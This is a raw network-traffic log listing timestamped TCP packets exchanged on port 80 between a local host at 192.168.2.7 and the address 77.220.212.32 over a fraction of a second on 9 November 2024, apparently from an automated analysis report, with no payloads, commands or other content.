Nov 9, 2024 02:47:11.333425045 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333436966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333444118 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333446980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333455086 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333488941 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333497047 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333518028 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333556890 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333745003 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333755970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333774090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333782911 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333786011 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333796978 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333801985 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333808899 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333821058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333822012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333832026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333843946 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333853006 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333854914 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333868980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333880901 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333882093 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333892107 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333894014 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333906889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333919048 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333924055 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333930016 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333930969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333959103 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333986044 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333996058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334007025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334017992 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334032059 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334044933 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334064960 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334089994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334101915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334111929 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334125996 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334139109 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334141970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334153891 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334167004 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.334167004 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334184885 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.334218025 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451071024 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451092958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451109886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451124907 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451143980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451154947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451174021 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451184034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451195002 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451200008 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451205969 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451210976 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451229095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451235056 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451258898 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451273918 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451283932 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451302052 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451320887 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451323032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451334953 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451345921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451353073 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451356888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451368093 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451375961 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451386929 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451397896 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451409101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451411009 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451425076 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451442957 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451447964 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451456070 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451467037 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451467991 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451478004 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451488018 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451503992 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451520920 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451536894 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451550961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451580048 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451617002 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451627016 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451663017 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451700926 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451710939 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451740026 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451757908 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451809883 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451838017 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.451849937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.451869965 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452177048 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452188969 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452199936 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452209949 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452220917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452238083 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452250004 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452260017 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452270985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452282906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452292919 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452303886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452368975 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452375889 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452379942 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452390909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452403069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452413082 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452455044 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452461958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452475071 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452487946 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452502012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452516079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452527046 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452528000 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452538013 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452555895 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452559948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452569962 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452579021 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452585936 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452595949 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452609062 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452609062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452620029 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452636957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452668905 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452682972 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452699900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452711105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452722073 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452723980 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452732086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452744007 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452754974 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452758074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452769995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452784061 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452797890 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452827930 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452851057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452862024 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452878952 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452892065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452894926 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452913046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452914953 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452929974 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452941895 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452943087 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452953100 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452953100 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452964067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452975035 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.452986002 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.452987909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453000069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453011036 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453017950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453022957 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453035116 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453044891 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453051090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453054905 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453066111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453075886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453079939 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453088999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453105927 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453131914 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453203917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453213930 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453224897 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453234911 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453250885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453250885 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453262091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453289032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453290939 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453299046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453309059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453316927 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453322887 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453334093 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453342915 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453346014 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453358889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453372002 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453382969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453412056 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453438997 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453450918 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453474998 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453501940 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453504086 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453514099 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453525066 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453547001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453567982 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453593016 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453604937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453613997 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453624010 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453634977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453635931 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453645945 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453676939 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453711987 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453739882 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453751087 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453762054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453777075 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453785896 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453795910 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453799963 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453809977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453825951 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453828096 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453840971 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453852892 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453856945 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453869104 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453880072 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453886032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453911066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453938007 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.453977108 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.453994989 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454005957 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454016924 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454022884 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454029083 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454031944 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454039097 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454057932 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454061985 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454070091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454080105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454092026 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454092026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454103947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454116106 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454122066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454127073 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454139948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454149961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454150915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454161882 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.454174042 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454195023 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.454214096 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.570993900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571007013 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571018934 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571031094 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571043015 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571055889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571075916 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571086884 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571099043 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571110964 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571122885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571149111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571161032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571173906 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571190119 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571201086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571207047 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571254969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571271896 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571281910 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571293116 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571305037 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571338892 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571356058 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571357965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571368933 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571381092 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571403980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571407080 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571415901 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571425915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571434975 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571463108 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571485043 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571559906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571571112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571582079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571604013 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571626902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571630955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571641922 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571651936 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571662903 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571675062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571686983 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571715117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571738005 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571747065 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571758032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571768999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571777105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571784973 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.571791887 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571827888 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.571990967 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572000027 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572026014 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572053909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572058916 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572066069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572076082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572088003 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572092056 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572110891 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572137117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572148085 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572165966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572177887 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572190046 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572195053 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572206974 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572213888 CET	49699	80	192.168.2.7	77.220.212.32
